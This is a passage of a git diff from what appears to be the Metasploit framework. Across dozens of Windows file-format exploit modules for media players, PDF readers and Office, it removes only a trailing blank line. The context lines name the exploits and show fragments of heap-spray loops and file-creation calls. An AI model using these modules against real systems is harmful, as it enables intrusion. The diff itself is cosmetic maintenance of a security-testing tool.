'#{datastore['FILENAME']}' file...") file_create(sploit) end - end diff --git a/modules/exploits/windows/fileformat/ca_cab.rb b/modules/exploits/windows/fileformat/ca_cab.rb index 5ae00d0f29..f50159beef 100644 --- a/modules/exploits/windows/fileformat/ca_cab.rb +++ b/modules/exploits/windows/fileformat/ca_cab.rb @@ -71,7 +71,6 @@ class MetasploitModule < Msf::Exploit::Remote file_create(cab) end - end =begin diff --git a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb index 74d01af04c..95195de5c8 100644 --- a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb +++ b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb @@ -64,5 +64,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(filerdp) end - end diff --git a/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb b/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb index d3bee00022..f62596a0b7 100644 --- a/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb @@ -90,5 +90,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(m3u) end - end diff --git a/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb b/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb index 41a9d79245..0d4ebecc19 100644 --- a/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb +++ b/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb @@ -119,5 +119,4 @@ class MetasploitModule < Msf::Exploit::Remote add_object(7, stream) finish_pdf end - end diff --git a/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb b/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb index fc30b5612e..501ae776e0 100644 --- a/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb +++ b/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb @@ -91,5 +91,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}' file...") file_create(xps.pack) end - end diff --git a/modules/exploits/windows/fileformat/csound_getnum_bof.rb b/modules/exploits/windows/fileformat/csound_getnum_bof.rb index eae252b690..f075843007 100644 --- a/modules/exploits/windows/fileformat/csound_getnum_bof.rb +++ b/modules/exploits/windows/fileformat/csound_getnum_bof.rb @@ -68,5 +68,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(sploit) end - end diff --git a/modules/exploits/windows/fileformat/cutezip_bof.rb b/modules/exploits/windows/fileformat/cutezip_bof.rb index ebce86fc4a..4f15243e23 100644 --- a/modules/exploits/windows/fileformat/cutezip_bof.rb +++ b/modules/exploits/windows/fileformat/cutezip_bof.rb @@ -92,5 +92,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}' file...") file_create(zip.pack) end - end diff --git a/modules/exploits/windows/fileformat/deepburner_path.rb b/modules/exploits/windows/fileformat/deepburner_path.rb index f9b8f1c490..eafb3a9112 100644 --- a/modules/exploits/windows/fileformat/deepburner_path.rb +++ b/modules/exploits/windows/fileformat/deepburner_path.rb @@ -109,5 +109,4 @@ EOS } ret end - end diff --git a/modules/exploits/windows/fileformat/destinymediaplayer16.rb b/modules/exploits/windows/fileformat/destinymediaplayer16.rb index 629dc9f4ea..bc13ace5d9 100644 --- a/modules/exploits/windows/fileformat/destinymediaplayer16.rb +++ b/modules/exploits/windows/fileformat/destinymediaplayer16.rb @@ -64,5 +64,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(filepls) end - end diff --git a/modules/exploits/windows/fileformat/digital_music_pad_pls.rb b/modules/exploits/windows/fileformat/digital_music_pad_pls.rb index 47b127b52c..9ce0350c64 100644 --- a/modules/exploits/windows/fileformat/digital_music_pad_pls.rb +++ b/modules/exploits/windows/fileformat/digital_music_pad_pls.rb @@ -71,5 +71,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(sploit) end - end diff --git a/modules/exploits/windows/fileformat/djstudio_pls_bof.rb b/modules/exploits/windows/fileformat/djstudio_pls_bof.rb index 8443fd6ac8..c4017061c4 100644 --- a/modules/exploits/windows/fileformat/djstudio_pls_bof.rb +++ b/modules/exploits/windows/fileformat/djstudio_pls_bof.rb @@ -65,5 +65,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(sploit) end - end diff --git a/modules/exploits/windows/fileformat/djvu_imageurl.rb b/modules/exploits/windows/fileformat/djvu_imageurl.rb index 4aa46eee23..fd90c051af 100644 --- a/modules/exploits/windows/fileformat/djvu_imageurl.rb +++ b/modules/exploits/windows/fileformat/djvu_imageurl.rb @@ -98,5 +98,4 @@ for (#{var_i} = 0; #{var_i} < 2024; #{var_i}++) { #{rand8} = #{rand8} + unescape file_create(content) end - end diff --git a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb index bc6a2e32f7..ee05581a30 100644 --- a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb +++ b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb @@ -98,5 +98,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(html) end - end diff --git a/modules/exploits/windows/fileformat/etrust_pestscan.rb b/modules/exploits/windows/fileformat/etrust_pestscan.rb index 96577875ff..d8082deda8 100644 --- a/modules/exploits/windows/fileformat/etrust_pestscan.rb +++ b/modules/exploits/windows/fileformat/etrust_pestscan.rb @@ -94,5 +94,4 @@ for (#{var_i} = 0; #{var_i} < 14500; #{var_i}++) { #{rand8} = #{rand8} + unescap file_create(content) end - end diff --git a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb index cab74cecbe..92cc81152a 100644 --- a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb +++ b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb @@ -110,5 +110,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(zip.pack) end - end diff --git a/modules/exploits/windows/fileformat/fatplayer_wav.rb b/modules/exploits/windows/fileformat/fatplayer_wav.rb index 4046527719..59aa758c7d 100644 --- a/modules/exploits/windows/fileformat/fatplayer_wav.rb +++ b/modules/exploits/windows/fileformat/fatplayer_wav.rb @@ -70,5 +70,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(sploit) end - end diff --git a/modules/exploits/windows/fileformat/fdm_torrent.rb b/modules/exploits/windows/fileformat/fdm_torrent.rb index b88be7c629..20b51df27e 100644 --- a/modules/exploits/windows/fileformat/fdm_torrent.rb +++ b/modules/exploits/windows/fileformat/fdm_torrent.rb @@ -136,5 +136,4 @@ class MetasploitModule < Msf::Exploit::Remote ret << "e" return ret end - end diff --git a/modules/exploits/windows/fileformat/feeddemon_opml.rb b/modules/exploits/windows/fileformat/feeddemon_opml.rb index 7d6f896f26..7663e71c54 100644 --- a/modules/exploits/windows/fileformat/feeddemon_opml.rb +++ b/modules/exploits/windows/fileformat/feeddemon_opml.rb @@ -129,5 +129,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(evil) end - end diff --git a/modules/exploits/windows/fileformat/foxit_title_bof.rb b/modules/exploits/windows/fileformat/foxit_title_bof.rb index 054bce447d..7a954a7231 100644 --- a/modules/exploits/windows/fileformat/foxit_title_bof.rb +++ b/modules/exploits/windows/fileformat/foxit_title_bof.rb @@ -145,5 +145,4 @@ class MetasploitModule < Msf::Exploit::Remote finish_pdf end - end diff --git a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb index 5259708447..672426f6d8 100644 --- a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb +++ b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb @@ -77,5 +77,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(wav) end - end diff --git a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb index ec0c55907c..dad09f5129 100644 --- a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb +++ b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb @@ -66,5 +66,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(sploit) end - end diff --git a/modules/exploits/windows/fileformat/gsm_sim.rb b/modules/exploits/windows/fileformat/gsm_sim.rb index 21461a960d..d90f2d39f6 100644 --- a/modules/exploits/windows/fileformat/gsm_sim.rb +++ b/modules/exploits/windows/fileformat/gsm_sim.rb @@ -68,5 +68,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(buffer) end - end diff --git a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb index bee2fadc73..cd0fcc1b01 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb @@ -79,5 +79,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(hhp) end - end diff --git a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb index f5e7351414..6f4a828c4f 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb @@ -77,5 +77,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(hhp) end - end diff --git a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb index 6eb7febf03..e03878a6ba 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb @@ -78,5 +78,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(hhp) end - end diff --git a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb index 152697f910..a926ea57b9 100644 --- a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb +++ b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb @@ -89,5 +89,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(bof) end - end diff --git a/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb b/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb index b9944dc59b..1d5edcef87 100644 --- a/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb +++ b/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb @@ -151,5 +151,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(xfdl) end - end diff --git a/modules/exploits/windows/fileformat/ibm_pcm_ws.rb b/modules/exploits/windows/fileformat/ibm_pcm_ws.rb index f2be36c7f5..cb104d6473 100644 --- a/modules/exploits/windows/fileformat/ibm_pcm_ws.rb +++ b/modules/exploits/windows/fileformat/ibm_pcm_ws.rb @@ -171,7 +171,6 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}' file for #{target.name}...") file_create(file) end - end =begin diff --git a/modules/exploits/windows/fileformat/icofx_bof.rb b/modules/exploits/windows/fileformat/icofx_bof.rb index 5167391d97..f0add62a0a 100644 --- a/modules/exploits/windows/fileformat/icofx_bof.rb +++ b/modules/exploits/windows/fileformat/icofx_bof.rb @@ -101,5 +101,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}' file...") file_create(ico) end - end diff --git a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb index 0667bd4131..f4f52ddd4c 100644 --- a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb +++ b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb @@ -94,5 +94,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(ipj) end - end diff --git a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb index 88910ddb09..99f1467a04 100644 --- a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb +++ b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb @@ -204,5 +204,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(jp2) end - end diff --git a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb index a6b632d8e6..e3f17d723d 100644 --- a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb +++ b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb @@ -357,5 +357,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(filecontent) end - end diff --git a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb index fdc73b15d8..ed45196ca0 100644 --- a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb +++ b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb @@ -100,7 +100,6 @@ try { file_create(content) end - end =begin diff --git a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb index fec8acf900..cc1e1c6d23 100644 --- a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb +++ b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb @@ -320,7 +320,6 @@ class MetasploitModule < Msf::Exploit::Remote super end - end =begin diff --git a/modules/exploits/windows/fileformat/mediajukebox.rb b/modules/exploits/windows/fileformat/mediajukebox.rb index 2eda741722..05ecd550cd 100644 --- a/modules/exploits/windows/fileformat/mediajukebox.rb +++ b/modules/exploits/windows/fileformat/mediajukebox.rb @@ -64,5 +64,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(sploit) end - end diff --git a/modules/exploits/windows/fileformat/microp_mppl.rb b/modules/exploits/windows/fileformat/microp_mppl.rb index 0ede9ebec6..e9c02db433 100644 --- a/modules/exploits/windows/fileformat/microp_mppl.rb +++ b/modules/exploits/windows/fileformat/microp_mppl.rb @@ -64,5 +64,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(mppl) end - end diff --git a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb index d32f2afe52..e4e59f1d98 100644 --- a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb +++ b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(filepls) end - end diff --git a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb index abca498815..dd1d3861f6 100644 --- a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb +++ b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb @@ -81,5 +81,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(pls) end - end diff --git a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb index beb7268a82..18b4f0385b 100644 --- a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb +++ b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb @@ -158,5 +158,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(filecontent) end - end diff --git a/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb b/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb index d1cb39ff58..334b76f673 100644 --- a/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb +++ b/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb @@ -202,5 +202,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(filecontent) end - end diff --git a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb index 84ccd92e71..7622e86e49 100644 --- a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb +++ b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb @@ -95,5 +95,4 @@ for (#{var_i} = 0; #{var_i} < 14500; #{var_i}++) { #{rand8} = #{rand8} + unescap file_create(content) end - end diff --git a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb index 3a111ec4f1..69643c691c 100644 --- a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb +++ b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb @@ -96,5 +96,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(sami) end - end diff --git a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb index fa9e182b9c..4cd65cfe0e 100644 --- a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb +++ b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb @@ -161,5 +161,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Generated output file #{out}") end - end diff --git a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb index fa01d9294c..9bc6637789 100644 --- a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb +++ b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb @@ -258,5 +258,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Generated output file #{out}") end - end diff --git a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb index 967858a28b..538f2a0b71 100644 --- a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb +++ b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb @@ -96,7 +96,6 @@ class MetasploitModule < Msf::Exploit::Remote file_create(buf) end - end =begin diff --git a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb index 2b582b238d..138e059b65 100644 --- a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb +++ b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb @@ -310,5 +310,4 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::BadConfig, "Unable to locate key: \"#{key}\"") if not rvas[key] rvas['BaseAddress'] + rvas[key] end - end diff --git a/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb b/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb index 74cfeab1d4..5460c7d9ca 100644 --- a/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb +++ b/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb @@ -297,5 +297,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(content) end - end diff --git a/modules/exploits/windows/fileformat/ms13_071_theme.rb b/modules/exploits/windows/fileformat/ms13_071_theme.rb index 7c0264caf1..f8a74ba8f0 100644 --- a/modules/exploits/windows/fileformat/ms13_071_theme.rb +++ b/modules/exploits/windows/fileformat/ms13_071_theme.rb @@ -110,5 +110,4 @@ MTSM=DABJDKT EOF file_create(theme) end - end diff --git a/modules/exploits/windows/fileformat/ms14_060_sandworm.rb b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb index c484410037..3244483c3e 100644 --- a/modules/exploits/windows/fileformat/ms14_060_sandworm.rb +++ b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb @@ -233,6 +233,5 @@ EOF inf end - end diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb index 07f20fd0a8..744ee3cc8f 100644 --- a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb +++ b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb @@ -147,6 +147,5 @@ class MetasploitModule < Msf::Exploit::Remote ole_contents end - end diff --git a/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb b/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb index badffe24be..2a2ac8b886 100644 --- a/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb +++ b/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb @@ -66,5 +66,4 @@ class MetasploitModule < Msf::Exploit::Remote mcl = generate_mcl file_create(mcl) end - end diff --git a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb index d2a3941ea6..ee9c6c1e41 100644 --- a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb +++ b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb @@ -96,5 +96,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(vbp) end - end diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb index 843039daa9..50a8f2bf7a 100644 --- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb +++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb @@ -872,7 +872,6 @@ class MetasploitModule < Msf::Exploit::Remote docx = make_docx(path) file_create(docx) end - end =begin diff --git a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb index 26e4240ca8..f64dcdcc9a 100644 --- a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb +++ b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb @@ -93,5 +93,4 @@ for (#{var_i} = 0; #{var_i} < 1000; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + file_create(content) end - end diff --git a/modules/exploits/windows/fileformat/mymp3player_m3u.rb b/modules/exploits/windows/fileformat/mymp3player_m3u.rb index df69d59f50..6199b8c011 100644 --- a/modules/exploits/windows/fileformat/mymp3player_m3u.rb +++ b/modules/exploits/windows/fileformat/mymp3player_m3u.rb @@ -100,5 +100,4 @@ EOF file_create(m3u) end - end diff --git a/modules/exploits/windows/fileformat/netop.rb b/modules/exploits/windows/fileformat/netop.rb index 38437badf3..92cb737d71 100644 --- a/modules/exploits/windows/fileformat/netop.rb +++ b/modules/exploits/windows/fileformat/netop.rb @@ -67,5 +67,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(buffer) end - end diff --git a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb index 4fbd80cf41..81fc5a990b 100644 --- a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb +++ b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb @@ -104,5 +104,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(makepdf) end - end diff --git a/modules/exploits/windows/fileformat/office_ole_multiple_dll_hijack.rb b/modules/exploits/windows/fileformat/office_ole_multiple_dll_hijack.rb index 5c6fa2ca77..4ed662b953 100644 --- a/modules/exploits/windows/fileformat/office_ole_multiple_dll_hijack.rb +++ b/modules/exploits/windows/fileformat/office_ole_multiple_dll_hijack.rb @@ -280,5 +280,4 @@ class MetasploitModule < Msf::Exploit::Remote ppsx.add_file('/ppt/embeddings/oleObject1.bin', create_ole(clsid)) ppsx.pack end - end diff --git a/modules/exploits/windows/fileformat/openoffice_ole.rb b/modules/exploits/windows/fileformat/openoffice_ole.rb index 813764d7f3..c579ee187a 100644 --- a/modules/exploits/windows/fileformat/openoffice_ole.rb +++ b/modules/exploits/windows/fileformat/openoffice_ole.rb @@ -79,6 +79,5 @@ class MetasploitModule < Msf::Exploit::Remote file_create(template) end - end diff --git a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb index bbb67334a3..db9af86ed3 100644 --- a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb +++ b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb @@ -116,5 +116,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(metalink) end - end diff --git a/modules/exploits/windows/fileformat/orbital_viewer_orb.rb b/modules/exploits/windows/fileformat/orbital_viewer_orb.rb index cdc94b0aa6..3915cdfc77 100644 --- a/modules/exploits/windows/fileformat/orbital_viewer_orb.rb +++ b/modules/exploits/windows/fileformat/orbital_viewer_orb.rb @@ -87,5 +87,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(sploit) end - end diff --git a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb index 72363df32b..c9dd9d6109 100644 --- a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb +++ b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(content) end - end diff --git a/modules/exploits/windows/fileformat/proshow_load_bof.rb b/modules/exploits/windows/fileformat/proshow_load_bof.rb index c9ba4e327a..7688b67e49 100644 --- a/modules/exploits/windows/fileformat/proshow_load_bof.rb +++ b/modules/exploits/windows/fileformat/proshow_load_bof.rb @@ -97,5 +97,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(sploit) end - end diff --git a/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb b/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb index 5dae7bd3dd..c549c40136 100644 --- a/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb +++ b/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb @@ -107,5 +107,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(zip.pack) end - end diff --git a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb index bcf80c1bfa..cc6b80d94e 100644 --- a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb +++ b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb @@ -213,7 +213,6 @@ class MetasploitModule < Msf::Exploit::Remote file_create(spd) end - end =begin diff --git a/modules/exploits/windows/fileformat/sascam_get.rb b/modules/exploits/windows/fileformat/sascam_get.rb index 38d0a078ce..af21512427 100644 --- a/modules/exploits/windows/fileformat/sascam_get.rb +++ b/modules/exploits/windows/fileformat/sascam_get.rb @@ -96,5 +96,4 @@ for (#{var_i} = 0; #{var_i} < 8293; #{var_i}++) { #{rand8} = #{rand8} + unescape file_create(content) end - end diff --git a/modules/exploits/windows/fileformat/scadaphone_zip.rb b/modules/exploits/windows/fileformat/scadaphone_zip.rb index dd3a9ba1ad..164436aabd 100644 --- a/modules/exploits/windows/fileformat/scadaphone_zip.rb +++ b/modules/exploits/windows/fileformat/scadaphone_zip.rb @@ -87,5 +87,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(zip.pack) end - end diff --git a/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb b/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb index 2cd14ff507..06c72043f6 100644 --- a/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb +++ b/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(buffer) end - end diff --git a/modules/exploits/windows/fileformat/somplplayer_m3u.rb b/modules/exploits/windows/fileformat/somplplayer_m3u.rb index c51890a196..5b427a90c6 100644 --- a/modules/exploits/windows/fileformat/somplplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/somplplayer_m3u.rb @@ -68,5 +68,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(sploit) end - end diff --git a/modules/exploits/windows/fileformat/tugzip.rb b/modules/exploits/windows/fileformat/tugzip.rb index 7557189656..ca5db12893 100644 --- a/modules/exploits/windows/fileformat/tugzip.rb +++ b/modules/exploits/windows/fileformat/tugzip.rb @@ -125,5 +125,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(zip.pack) end - end diff --git a/modules/exploits/windows/fileformat/ultraiso_ccd.rb b/modules/exploits/windows/fileformat/ultraiso_ccd.rb index 0f07777cf8..58fbbbc3a2 100644 --- a/modules/exploits/windows/fileformat/ultraiso_ccd.rb +++ b/modules/exploits/windows/fileformat/ultraiso_ccd.rb @@ -215,5 +215,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create('') end - end diff --git a/modules/exploits/windows/fileformat/ultraiso_cue.rb b/modules/exploits/windows/fileformat/ultraiso_cue.rb index bc96058f10..fa00a1cd2f 100644 --- a/modules/exploits/windows/fileformat/ultraiso_cue.rb +++ b/modules/exploits/windows/fileformat/ultraiso_cue.rb @@ -120,5 +120,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create('') end - end diff --git a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb index a59baa33ff..abe1ed1ec4 100644 --- a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb +++ b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb @@ -256,5 +256,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(sploit) end - end diff --git a/modules/exploits/windows/fileformat/varicad_dwb.rb b/modules/exploits/windows/fileformat/varicad_dwb.rb index dd3b34025a..5cf7171f2a 100644 --- 